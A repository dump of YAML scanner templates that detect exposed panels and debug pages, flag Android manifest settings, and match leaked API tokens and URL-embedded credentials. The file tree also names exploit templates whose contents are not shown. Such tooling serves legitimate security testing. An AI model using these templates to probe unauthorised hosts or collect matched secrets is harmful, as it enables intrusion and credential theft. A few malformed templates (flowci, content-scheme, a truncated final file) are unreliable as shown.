├── .gitattributes ├── expired-ssl.yaml ├── S3Hunter.yaml ├── crxde.yaml ├── file-scheme.yaml ├── api ├── pictatic-api-key.yaml ├── twilio-api.yaml ├── mailgun-api.yaml ├── slack-api.yaml ├── google-api.yaml ├── mailchimp-api.yaml ├── sendgrid-api.yaml ├── stripe-api-key.yaml ├── picatic-api-key.yaml ├── newrelic-rest-api-key.yaml ├── newrelic-admin-api-key.yaml ├── strapi-admin-exposure.yaml ├── wsdl-api.yaml ├── mailchimp-api-key.yaml ├── sendgrid-api-key.yaml ├── artifactory-api-token.yaml ├── google-api-key.yaml ├── artifactory-api-password.yaml ├── zapier-webhook-token.yaml ├── api-c99.yaml ├── api-fastly.yaml ├── strapi-panel.yaml └── strapi-page.yaml ├── content-scheme.yaml ├── shopify-token.yaml ├── debug-enabled.yaml ├── debug-pprof.yaml ├── git ├── github-app-token.yaml ├── github-oauth-token.yaml ├── github-personal-token.yaml ├── github-refresh-token.yaml ├── gitlab-ci.yaml └── github-enterprise-detect.yaml ├── home-assistant.yaml ├── shopify-shared-secret.yaml ├── aws ├── aws-access-id.yaml └── aws-access-key-value.yaml ├── crxde-lite.yaml ├── shopify-custom-token.yaml ├── shopify-private-token.yaml ├── square-oauth-secret.yaml ├── dynatrace-token.yaml ├── jmx-console.yaml ├── linkedin-id.yaml ├── webview-load-url.yaml ├── gcp-service-account.yaml ├── e-vulnerability ├── ds-store-leak.yaml ├── ikuai-login-panel.yaml ├── myucms-lfr.yaml ├── web-config.yaml ├── svn-leak.yaml ├── wordpress-wpconfig-inclosure.yaml ├── kingsoft-v8-rce.yaml ├── thinkcmf-lfi.yaml ├── sangfor-vpn-supersession-rce.yaml ├── yyoa-a6-userinfo-disclosure.yaml ├── natshell-arbitrary-file-read.yaml ├── dedecms-url-redirection.yaml ├── docker-registry.yaml ├── consul-rexec-rce.yaml ├── duomicms-sqli.yaml ├── fangweicms-sqli.yaml ├── maccms-rce.yaml ├── msvod-sqli.yaml └── nuuo-file-inclusion.yaml ├── facebook-client-id.yaml ├── facebook-secret.yaml ├── a-fingerprinting ├── grafana-detect.yaml ├── druid-panel.yaml ├── nacos-detect.yaml ├── solarwinds-orion-panel.yaml ├── 
spring-detect.yaml ├── django-admin-panel.yaml ├── sonicwall-management-panel.yaml ├── minio-browser.yaml ├── thinkphp-detect.yaml ├── wayos-panel.yaml ├── azure-kubernetes-service.yaml ├── landray-oa-panel.yaml ├── sonicwall-sslvpn-panel.yaml ├── zentao-detect.yaml └── mongodb-ops-manager.yaml ├── citrix-vpn-detect.yaml ├── cloudinary.yaml ├── credentials.yaml ├── flowci-detection.yaml ├── mongo-express-web-gui.yaml ├── samba-swat-panel.yaml ├── call-break-cms.yaml ├── certificate-validation.yaml ├── cockpit-detect.yaml ├── compal.yaml ├── couchdb-fauxton.yaml ├── cx-cloud-login.yaml ├── deadbolt-ransomware.yaml ├── flink-exposure.yaml ├── rabbitmq-dashboard.yaml ├── redash-detection.yaml ├── bitly-secret-key.yaml ├── kafka-connect-ui.yaml ├── slack-bot-token.yaml ├── hadoop-exposure.yaml ├── paypal-braintree-token.yaml ├── webview-javascript.yaml ├── wordpress ├── wp-xmlrpc.yaml └── wordpress-duplicator-path-traversal.yaml ├── kubernetes └── kubernetes-dashboard.yaml ├── mantis-detect.yaml ├── slack-user-token.yaml ├── slack-webhook.yaml ├── x-hacker.yaml ├── aims-password-mgmt-client.yaml ├── biometric-detect.yaml ├── kafka-topics-ui.yaml ├── kronos-workforce-central.yaml ├── maian-cart-detect.yaml ├── newrelic-insights-key.yaml ├── rocketmq-console-exposure.yaml ├── s3-detect.yaml ├── smtp-detection.yaml ├── square-access-token.yaml ├── supervpn-panel.yaml ├── webview-universal-access.yaml ├── X-Host.yaml ├── compal-panel.yaml ├── easyredir.yaml ├── firebase-database.yaml ├── solarwinds-orion.yaml ├── sonarqube-login.yaml ├── sql-server-reporting.yaml ├── zipkin-exposure.yaml ├── basic-cors-flash.yaml ├── jwt-token.yaml ├── kafka-monitoring.yaml ├── sonicwall-sslvpn-panel.yaml ├── stridercd-detection.yaml ├── stripe-secret-key.yaml ├── twitter-secret.yaml ├── unauthenticated-lansweeper.yaml ├── vm ├── vmware-vcenter-lfi-linux.yaml ├── saferoads-vms-login.yaml └── vmware-horizon.yaml ├── yopass-panel.yaml ├── amazon-sns-token.yaml ├── amazon-sns-topic.yaml ├── 
argocd-detect.yaml ├── bazarr-login.yaml ├── exposed-pagespeed-global-admin.yaml ├── oauth-access-key.yaml ├── parallels-html-client.yaml ├── urge-takeover.yaml ├── webview-addjavascript-interface.yaml ├── X-Client-IP.yaml ├── branch-key.yaml ├── manage-engine-admanager-panel.yaml ├── sonarqube-token.yaml ├── stripe-restricted-key.yaml ├── surge-takeover.yaml ├── versa-sdwan.yaml ├── werkzeug-debugger-detect.yaml ├── bmc-panel-detect.yaml ├── jkstatus-manager.yaml ├── kinsta-takeover.yaml ├── X-Remote-Addr.yaml ├── cve ├── 2007 │ └── CNVD-200705-315.yaml ├── 2015 │ └── CVE-2015-7297.yaml ├── 2017 │ ├── CVE-2017-16877.yaml │ ├── CVE-2017-8917.yaml │ └── CVE-2017-1000028.yaml ├── 2018 │ ├── CVE-2018-12613.yaml │ ├── CVE-2018-7490.yaml │ └── CVE-2018-10736.yaml ├── 2019 │ ├── CNVD-2019-16798.yaml │ ├── CVE-2019-18394.yaml │ └── CVE-2019-11510.yaml ├── 2020 │ ├── CNVD-2020-57264.yaml │ └── CVE-2020-5515.yaml ├── 2021 │ ├── CVE-2021-29622.yaml │ └── CNVD-2021-10543.yaml └── 2022 │ └── CVE-2022-33891.yaml ├── discord-webhook.yaml ├── httpbin-detection.yaml ├── jdbc-connection-string.yaml ├── x-forwarded-for.yaml ├── b-disclosure └── hadoop-disclosure.yaml ├── c-unauthorized ├── frp-unauthenticated.yaml ├── kibana-unauth.yaml ├── jeecg-boot.yaml ├── ruoyi-druid-unauth.yaml ├── airflow-unauth.yaml └── spark-api-unauth.yaml ├── circleci.yaml ├── dynamic-broadcast-receiver.yaml ├── google ├── google-storage.yaml ├── google-mapsembed.yaml ├── google-calendar-link.yaml ├── google-staticmaps.yaml └── google-mapsembedadvanced.yaml ├── jazzhr-takeover.yaml ├── mashery-takeover.yaml ├── newrelic-synthetics-location-key.yaml ├── prometheus-exposed-panel.yaml ├── provider-path.yaml ├── selenoid-ui-exposure.yaml ├── smugmug-takeover.yaml ├── surveygizmo-takeover.yaml ├── tave-takeover.yaml ├── ansible-config-disclosure.yaml ├── dotcms-admin-panel.yaml ├── fastly-takeover.yaml ├── hatenablog-takeover.yaml ├── lazy-file.yaml ├── readme-takeover.yaml ├── server-status.yaml ├── 
traefik-dashboard.yaml ├── webmin └── webmin-panel.yaml ├── zendesk-takeover.yaml ├── druid-console-exposure.yaml ├── electron-version-detect.yaml ├── exposed-webalizer.yaml ├── feedpress-takeover.yaml ├── gemfury-takeover.yaml ├── memcached-stats.yaml ├── readthedocs-takeover.yaml ├── smartling-takeover.yaml ├── teamwork-takeover.yaml ├── zoho-webhook-token.yaml ├── agilecrm-takeover.yaml ├── aha-takeover.yaml ├── braintree-access-token.yaml ├── cloudinary-credentials.yaml ├── empirecms-detect.yaml ├── hmc-hybris-panel.yaml ├── pentaho-panel.yaml ├── perl-status.yaml ├── sap-router.yaml ├── struts-debug-mode.yaml ├── symfony ├── symfony-detect.yaml ├── symfony-phpinfo.yaml ├── sqli-symfony.yaml └── symfony-profiler.yaml ├── vend-takeover.yaml ├── zentral-detection.yaml ├── checkmarx-panel.yaml ├── drupal └── drupal-install.yaml ├── helpjuice-takeover.yaml ├── jiva-admin-exposure.yaml ├── netscalar-aaa-login.yaml ├── sonicwall-management-panel.yaml ├── wishpond-takeover.yaml ├── X-Remote-IP.yaml ├── airflow-configuration-exposure.yaml ├── apache ├── apache-dubbo-detect.yaml ├── default-tomcat-page.yaml └── public-tomcat-instance.yaml ├── cx-cloud-upload-detect.yaml ├── default-iis7-page.yaml ├── emqx-detection.yaml ├── fcm-server-key.yaml ├── hashicorp-consul-version.yaml ├── jetbrains-takeover.yaml ├── unbounce-takeover.yaml ├── wangshen-file.yaml ├── Airflow-unauthorized.yaml ├── airee-takeover.yaml ├── cx-cloud-login-1.yaml ├── elmah-log-file.yaml ├── gradle-enterprise-build-cache-detect.yaml ├── helpscout-takeover.yaml ├── misconfigured-concrete5.yaml ├── network-camera-detect.yaml ├── ngrok-takeover.yaml ├── rails-debug-mode.yaml ├── slack-webhook-token.yaml ├── somfy-login.yaml ├── amazon-mws-auth-token.yaml ├── citrix-adc-gateway-detect.yaml ├── cx-cloud-login-2.yaml ├── exposed-kafdrop.yaml ├── fanruanoa2012-detect.yaml ├── find-config.xml copy.yaml ├── hashicorp-vault-detect.yaml ├── jspxcms-detect.yaml ├── lancom-router-panel.yaml ├── 
leostream-detection.yaml ├── openweather.yaml ├── pbootcms-detect.yaml ├── rstudio-detect.yaml ├── sap-hana-xsengine-panel.yaml ├── saprouter-detect.yaml ├── totemomail-smtp-detect.yaml ├── buttercms.yaml ├── default-movable-page.yaml ├── django └── django-admin-panel.yaml ├── entrust-identityguard.yaml ├── expn-mail-detect.yaml ├── harbor-detect.yaml ├── pantheon-takeover.yaml ├── uberflip-takeover.yaml ├── wakatime.yaml ├── amazon-docker-config.yaml ├── brightcove-takeover.yaml ├── d-default-pwd ├── mofi4500-default-password.yaml └── ns-icg-default-password.yaml ├── defectdojo-panel.yaml ├── fortinet-fortigate-panel.yaml ├── gerapy-detect.yaml ├── laravel-debug-error.yaml ├── netlify-cms.yaml ├── simplebooklet-takeover.yaml ├── xenforo-login.yaml ├── anima-takeover.yaml ├── extract-firebase-database.yaml ├── kafka-center-login.yaml ├── sophos-mobile-panel-detection.yaml ├── stripe.yaml ├── wildcard-postmessage.yaml ├── aspnuke-openredirect.yaml ├── clave-login-panel.yaml ├── default-jetty-page.yaml ├── druid-monitor.yaml ├── getresponse-takeover.yaml ├── ipstack.yaml ├── java-rmi-detect.yaml ├── livezilla-login-panel.yaml ├── myucms-lfr.yaml ├── sharecenter-login.yaml ├── xxljob-admin-detect.yaml ├── basic-auth-detection.yaml ├── dreambox-detect.yaml ├── ems-login-panel.yaml ├── instagram.yaml ├── jaspersoft-detect.yaml ├── lokalise.yaml ├── microsoft-teams-webhook.yaml ├── octoprint-login.yaml ├── openerp-database.yaml ├── sap-netweaver-portal.yaml ├── valid-gmail-check.yaml ├── webflow-takeover.yaml ├── wufoo-takeover.yaml ├── zenario-login-panel.yaml ├── aftership-takeover.yaml ├── amazon-docker-config-disclosure.yaml ├── calendly.yaml ├── code42-panel.yaml ├── crush-ftp-detect.yaml ├── edgeos-login.yaml ├── fuelcms-panel.yaml ├── hivemanager-login-panel.yaml ├── jira-unauthenticated-projects.yaml ├── mapbox.yaml ├── medium-takeover.yaml ├── netscaler-aaa-login.yaml ├── php ├── phpmyadmin-panel-1.yaml ├── phpmyadmin-panel-3.yaml ├── phpmyadmin-panel-10.yaml 
├── phpmyadmin-panel-11.yaml ├── phpmyadmin-panel-2.yaml ├── phpmyadmin-panel-6.yaml ├── phpmyadmin-panel-7.yaml ├── phpmyadmin-panel-8.yaml └── phpmyadmin-panel-9.yaml ├── proposify-takeover.yaml ├── ricoh-pro8320-webserver.yaml ├── shiro-detect.yaml ├── starttls-mail-detect.yaml ├── CRMEB-sqli.yaml ├── asana.yaml ├── exposed-hg.yaml ├── exsi-system.yaml ├── frontify-takeover.yaml ├── gradle-enterprise-panel.yaml ├── node-red-detect.yaml ├── npm-log-file.yaml ├── oracle-dbass-detect.yaml ├── securenvoy-panel.yaml ├── workspace-one-uem.yaml ├── zipkin-exposure-1.yaml ├── adfs-detect.yaml ├── contacam.yaml ├── default-fastcgi-page.yaml ├── default-openresty.yaml ├── dotclear-detect.yaml ├── firebase-detect.yaml ├── froxlor-detect.yaml ├── jfrog.yaml ├── jira-unauthenticated-user-picker.yaml ├── mailgun.yaml ├── pingdom-takeover.yaml ├── powerlogic-ion.yaml ├── puppetboard-panel.yaml ├── spotify.yaml ├── synnefo-admin-panel.yaml └── vercel-takeover.yaml
/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto
--------------------------------------------------------------------------------
/expired-ssl.yaml:
--------------------------------------------------------------------------------
# Reports a TLS endpoint whose presented certificate is already past its notAfter date.
id: expired-ssl

info:
  name: Expired SSL Certificate
  author: pdteam
  severity: low
  tags: ssl

ssl:
  - address: '{{Host}}:{{Port}}'
    matchers:
      - type: dsl
        dsl:
          # current epoch seconds compared against the certificate's notAfter timestamp
          - 'unixtime() > not_after'
--------------------------------------------------------------------------------
/S3Hunter.yaml:
--------------------------------------------------------------------------------
# Unauthenticated GET against the target root; an S3 object-listing body means
# the bucket answers ListObjects to anonymous callers.
id: s3-hunter

info:
  name: Hunts for unreferenced AWS S3 Buckets
  author: glatisant
  severity: medium

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          # root element of the S3 ListObjects XML response
          - 'ListBucketResult'
--------------------------------------------------------------------------------
/crxde.yaml:
--------------------------------------------------------------------------------
# Detects an exposed AEM CRXDE Lite console (same check as crxde-lite.yaml).
id: crxde

info:
  name: CRXDE Lite
  author: nadino
  severity: info

requests:
  - method: GET
    path:
      - '{{BaseURL}}/crx/de/index.jsp'
    matchers:
      - type: word
        words:
          - 'CRXDE Lite'
--------------------------------------------------------------------------------
/file-scheme.yaml:
--------------------------------------------------------------------------------
# Static check over Android XML (e.g. a manifest): an intent filter that
# accepts the file:// scheme.
id: file-scheme

info:
  name: File Scheme Enabled
  author: gaurang
  severity: info
  tags: android,file

file:
  - extensions:
      - xml

    matchers:
      - type: word
        words:
          - 'android:scheme="file"'
--------------------------------------------------------------------------------
/api/pictatic-api-key.yaml:
--------------------------------------------------------------------------------
# File extractor for sk_live_ keys. Note: api/picatic-api-key.yaml carries the
# same pattern (over HTTP bodies); the "Pictatic" spelling here is the template id.
id: pictatic-api-key

info:
  name: Pictatic API Key
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'sk_live_[0-9a-z]{32}'
--------------------------------------------------------------------------------
/api/twilio-api.yaml:
--------------------------------------------------------------------------------
# Twilio API key: the literal "twilio" within 20 characters before an SK-prefixed
# 32-hex-digit secret (case-insensitive throughout because of the leading (?i)).
id: twilio-api

info:
  name: Twilio API Key
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - '(?i)twilio(.{0,20})?SK[0-9a-f]{32}'
--------------------------------------------------------------------------------
/content-scheme.yaml:
--------------------------------------------------------------------------------
id: content-scheme

info:
  name: Content
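Scheme Enabled
  author: gaurang
  severity: info
  tags: android,file

file:
  - extensions:
      - xml

    matchers:
      - type: word
        words:
          # intent filter accepting the content:// scheme
          - 'android:scheme="content"'
--------------------------------------------------------------------------------
/shopify-token.yaml:
--------------------------------------------------------------------------------
# Shopify access token (shpat_ prefix + 32 hex characters).
id: shopify-access-token

info:
  name: Shopify Access Token
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'shpat_[a-fA-F0-9]{32}'
--------------------------------------------------------------------------------
/api/mailgun-api.yaml:
--------------------------------------------------------------------------------
# Mailgun private API key. The "key-" prefix followed by 32 alphanumerics is a
# generic shape, so expect false positives and review hits manually.
id: mailgun-api-key

info:
  name: Mailgun API Key
  author: gaurang
  severity: high
  tags: token,file,mailgun

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'key-[0-9a-zA-Z]{32}'
--------------------------------------------------------------------------------
/api/slack-api.yaml:
--------------------------------------------------------------------------------
# Slack token prefixes: xoxb (bot), xoxa (app), xoxp (user), xoxr (refresh), xoxs (session).
id: slack-api

info:
  name: Slack API Key
  author: gaurang
  severity: high
  tags: token,file,slack

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # The original pattern wrapped the token body in an optional group
          # ("(...)?"), so a bare "xoxb-" with nothing after it was extracted as
          # a finding. The body is now mandatory.
          - 'xox[baprs]-[0-9a-zA-Z]{10,48}'
--------------------------------------------------------------------------------
/debug-enabled.yaml:
--------------------------------------------------------------------------------
# Android manifest with android:debuggable="true" (the app can be attached to
# and inspected on-device).
id: android-debug-enabled

info:
  name: Android Debug Enabled
  author: gaurang
  severity: low
  tags: android,file

file:
  - extensions:
      - all

    matchers:
      - type: regex
        regex:
          - 'android:debuggable="true"'
--------------------------------------------------------------------------------
/debug-pprof.yaml:
--------------------------------------------------------------------------------
# Go net/http/pprof index page reachable without authentication.
id: debug-pprof

info:
  name: pprof debug file
  author: pdteam
  severity: low

requests:
  - method: GET
    path:
      - '{{BaseURL}}/debug/pprof/'
    matchers:
      - type: word
        words:
          - 'Types of profiles available'
--------------------------------------------------------------------------------
/git/github-app-token.yaml:
--------------------------------------------------------------------------------
# GitHub App tokens: ghu_ (user-to-server) and ghs_ (server-to-server).
# NOTE(review): sibling GitHub token templates in this repo are rated high;
# consider aligning this severity.
id: github-app-token

info:
  name: Github App Token
  author: tanq16
  severity: medium
  tags: token,file,github

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # The original used ".{36}", which also ran across quotes, spaces and
          # other punctuation into unrelated text; restrict the body to the
          # alphanumeric set the prefix is followed by.
          - 'gh[us]_[A-Za-z0-9]{36}'
--------------------------------------------------------------------------------
/home-assistant.yaml:
--------------------------------------------------------------------------------
# Fingerprints a Home Assistant front end by its name in the root page.
id: home-assistant

info:
  name: Detect Home Assistant
  author: fabaff
  severity: info

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - 'Home Assistant'
--------------------------------------------------------------------------------
/api/google-api.yaml:
--------------------------------------------------------------------------------
id: google-api-key-file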
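
info:
  name: Google API key
  author: gaurang
  severity: info
  tags: token,file,google

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # AIza prefix + 35 characters of the key alphabet
          - 'AIza[0-9A-Za-z\-_]{35}'
--------------------------------------------------------------------------------
/git/github-oauth-token.yaml:
--------------------------------------------------------------------------------
# GitHub OAuth access token (gho_ prefix).
id: github-oauth-token

info:
  name: Github OAuth Access Token
  author: tanq16
  severity: high
  tags: token,file,github

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # ".{36}" in the original matched across quotes/whitespace into
          # unrelated text; the body is now limited to alphanumerics.
          - 'gho_[A-Za-z0-9]{36}'
--------------------------------------------------------------------------------
/git/github-personal-token.yaml:
--------------------------------------------------------------------------------
# GitHub personal access token (classic, ghp_ prefix).
id: github-personal-token

info:
  name: Github Personal Token
  author: geeknik
  severity: high
  # "github" tag added for parity with the other git/ token templates
  tags: token,file,github

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # body restricted to alphanumerics; ".{36}" also consumed quotes and spaces
          - 'ghp_[A-Za-z0-9]{36}'
--------------------------------------------------------------------------------
/git/github-refresh-token.yaml:
--------------------------------------------------------------------------------
# GitHub refresh token (ghr_ prefix).
id: github-refresh-token

info:
  name: Github Refresh Token
  author: tanq16
  severity: high
  tags: token,file,github

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # body restricted to alphanumerics; ".{36}" also consumed quotes and spaces
          - 'ghr_[A-Za-z0-9]{36}'
--------------------------------------------------------------------------------
/shopify-shared-secret.yaml:
--------------------------------------------------------------------------------
# Shopify shared secret (shpss_ prefix + 32 hex characters).
id: shopify-shared-secret

info:
  name: Shopify Shared Secret
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'shpss_[a-fA-F0-9]{32}'
--------------------------------------------------------------------------------
/aws/aws-access-id.yaml:
--------------------------------------------------------------------------------
# AWS access key ID. The ID alone is not a secret (hence low), but it identifies
# the principal and pairs with a secret key that may sit in the same file.
id: aws-access-key

info:
  name: AWS Access Key ID
  author: gaurang
  severity: low

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # known key-ID prefixes followed by 16 upper-case alphanumerics
          - '(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
--------------------------------------------------------------------------------
/api/mailchimp-api.yaml:
--------------------------------------------------------------------------------
# Mailchimp API key: 32 hex characters with a -usNN data-center suffix.
id: mailchimp-api-key

info:
  name: Mailchimp API Key
  author: gaurang
  severity: high
  tags: token,file,mailchimp

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - '[0-9a-f]{32}-us[0-9]{1,2}'
--------------------------------------------------------------------------------
/crxde-lite.yaml:
--------------------------------------------------------------------------------
# Exposed AEM CRXDE Lite console (duplicate of crxde.yaml, with the panel tag).
id: crxde-lite

info:
  name: CRXDE Lite
  author: nadino
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/crx/de/index.jsp'
    matchers:
      - type: word
        words:
          - 'CRXDE Lite'
--------------------------------------------------------------------------------
/shopify-custom-token.yaml:
--------------------------------------------------------------------------------
# Shopify custom-app access token (shpca_ prefix + 32 hex characters).
id: shopify-custom-token

info:
  name: Shopify Custom App Access Token
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'shpca_[a-fA-F0-9]{32}'
--------------------------------------------------------------------------------
/shopify-private-token.yaml: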
--------------------------------------------------------------------------------
# Shopify private-app access token (shppa_ prefix + 32 hex characters).
id: shopify-private-token

info:
  name: Shopify Private App Access Token
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'shppa_[a-fA-F0-9]{32}'
--------------------------------------------------------------------------------
/square-oauth-secret.yaml:
--------------------------------------------------------------------------------
# Square OAuth application secret (sq0csp- prefix + 43 URL-safe characters).
id: square-oauth-secret

info:
  name: Square OAuth Secret
  author: gaurang
  severity: high
  tags: token,file,square

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'sq0csp-[0-9A-Za-z\-_]{43}'
--------------------------------------------------------------------------------
/dynatrace-token.yaml:
--------------------------------------------------------------------------------
# Dynatrace API token: dt0<letter><2 digits>.<24 chars>.<64 chars>.
id: dynatrace-token

info:
  name: Dynatrace Token
  author: gaurang
  severity: high
  tags: token,file

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64}'
--------------------------------------------------------------------------------
/jmx-console.yaml:
--------------------------------------------------------------------------------
# JBoss JMX management console reachable at /jmx-console/. A hit only proves
# the console page is served; whether it is unauthenticated must be confirmed.
id: jmx-console

info:
  name: JMX Console
  author: yashanand155
  severity: low
  tags: panel,jmx

requests:
  - method: GET
    path:
      - '{{BaseURL}}/jmx-console/'
    matchers:
      - type: word
        words:
          - 'JBoss JMX Management Console'
--------------------------------------------------------------------------------
/linkedin-id.yaml:
--------------------------------------------------------------------------------
# LinkedIn client ID: "linkedin" (case-insensitive) within 20 characters of a
# 12-character lower-case alphanumeric value; (?-i) makes the value itself
# case-sensitive.
id: linkedin-client-id

info:
  name: Linkedin Client ID
  author: gaurang
  severity: low
  tags: token,file,linkedin

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - '(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}'
--------------------------------------------------------------------------------
/api/sendgrid-api.yaml:
--------------------------------------------------------------------------------
# SendGrid API key: SG.<22 chars>.<43 chars>.
id: sendgrid-api-key-file

info:
  name: Sendgrid API Key
  author: gaurang
  severity: high
  tags: token,file,sendgrid

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'SG\.[a-zA-Z0-9]{22}\.[a-zA-Z0-9]{43}'
--------------------------------------------------------------------------------
/api/stripe-api-key.yaml:
--------------------------------------------------------------------------------
# Stripe live secret (sk_live_) or restricted (rk_live_) key near the word "stripe".
id: stripe-api-key

info:
  name: Stripe API Key
  author: gaurang
  severity: high
  tags: token,file,stripe

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - '(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}'
--------------------------------------------------------------------------------
/webview-load-url.yaml:
--------------------------------------------------------------------------------
# Smali reference to WebView.loadUrl(String); an informational marker for
# manual review of what URLs reach the WebView.
id: webview-load-url

info:
  name: Webview loadUrl usage
  author: gaurang
  severity: info
  tags: android,file

file:
  - extensions:
      - all

    matchers:
      - type: word
        words:
          - 'Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V'
--------------------------------------------------------------------------------
/gcp-service-account.yaml:
--------------------------------------------------------------------------------
id: gcp-service-account

info:
  name: Google (GCP) Service-account
  author: gaurang
  severity: low
  tags: token,file,google

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          # the "type" field of a GCP service-account credential JSON
          - '"type": "service_account"'
--------------------------------------------------------------------------------
/e-vulnerability/ds-store-leak.yaml:
--------------------------------------------------------------------------------
# xray-style rule: a served /.DS_Store whose body starts with the "Bud1"
# header leaks directory contents.
id: ds-store-leak

info:
  name: Directory Listing via DS_Store
  author: 0w4ys
  severity: info
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /.DS_Store
    expression: response.status == 200 && response.body.bcontains(b'Bud1')
expression: r0()
--------------------------------------------------------------------------------
/facebook-client-id.yaml:
--------------------------------------------------------------------------------
# Facebook app/client ID: "facebook" or "fb" followed within 20 characters by a
# quoted 13-17 digit number.
id: facebook-client-id

info:
  name: Facebook Client ID
  author: gaurang
  severity: info
  tags: token,file,facebook

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]"
--------------------------------------------------------------------------------
/facebook-secret.yaml:
--------------------------------------------------------------------------------
# Facebook app secret: "facebook"/"fb" near a quoted 32-hex-digit value
# ((?-i) keeps the hex part case-sensitive).
id: facebook-secret-key

info:
  name: Facebook Secret Key
  author: gaurang
  severity: low
  tags: token,file,facebook

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]"
--------------------------------------------------------------------------------
/a-fingerprinting/grafana-detect.yaml:
--------------------------------------------------------------------------------
# xray-style rule: Grafana login page.
id: grafana-panel

info:
  name: Grafana Panel
  author: organiccrap
  severity: info
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /login
    expression: response.status == 200 && response.body.bcontains(b'Grafana')
expression: r0()
--------------------------------------------------------------------------------
/citrix-vpn-detect.yaml:
--------------------------------------------------------------------------------
# Citrix Gateway (NetScaler) VPN login page.
id: citrix-vpn-detect

info:
  name: Citrix VPN Detection
  author: pdteam
  severity: info
  tags: panel,citrix

requests:
  - method: GET
    path:
      - '{{BaseURL}}/vpn/index.html'
    matchers:
      - type: word
        words:
          - 'Citrix Gateway'
--------------------------------------------------------------------------------
/cloudinary.yaml:
--------------------------------------------------------------------------------
# Cloudinary URL with embedded api_key:api_secret@cloud_name (full credentials).
id: cloudinary-basic-auth

info:
  name: Cloudinary Basic Auth
  author: gaurang
  severity: high
  tags: token,file,cloudinary

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'cloudinary://[0-9]{15}:[0-9A-Za-z\-_]+@[0-9A-Za-z\-_]+'
--------------------------------------------------------------------------------
/credentials.yaml:
--------------------------------------------------------------------------------
# Generic scheme://user:password@host URL with credentials embedded in it.
id: basic-auth-creds

info:
  name: Basic Auth Credentials
  author: gaurang
  severity: high
  tags: token,file,auth

file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
--------------------------------------------------------------------------------
/flowci-detection.yaml:
--------------------------------------------------------------------------------
# FlowCI web front end; redirects are followed so the marker is checked on the
# landing page.
id: flowci-detection

info:
  name: FlowCI Detection
  author: Adam Crosser
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/'
    redirects: true

matchers: 16 | - type: word 17 | words: 18 | - 'flow-web-x' 19 | -------------------------------------------------------------------------------- /mongo-express-web-gui.yaml: -------------------------------------------------------------------------------- 1 | id: mongo-express-web-gui 2 | 3 | info: 4 | name: Mongo Express Web GUI 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Set-Cookie: mongo-express=" 16 | part: header 17 | -------------------------------------------------------------------------------- /samba-swat-panel.yaml: -------------------------------------------------------------------------------- 1 | id: samba-swat-panel 2 | 3 | info: 4 | name: Samba SWAT panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,samba 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Basic realm="SWAT"' 18 | part: header 19 | -------------------------------------------------------------------------------- /a-fingerprinting/druid-panel.yaml: -------------------------------------------------------------------------------- 1 | id: druid-panel 2 | 3 | info: 4 | name: Druid Panel 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /druid/login.html 14 | expression: response.status == 200 && response.body.bcontains(b'<title>druid monitor') 15 | expression: r0() -------------------------------------------------------------------------------- /api/picatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: picatic-api-key 2 | 3 | info: 4 | name: Picatic API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | 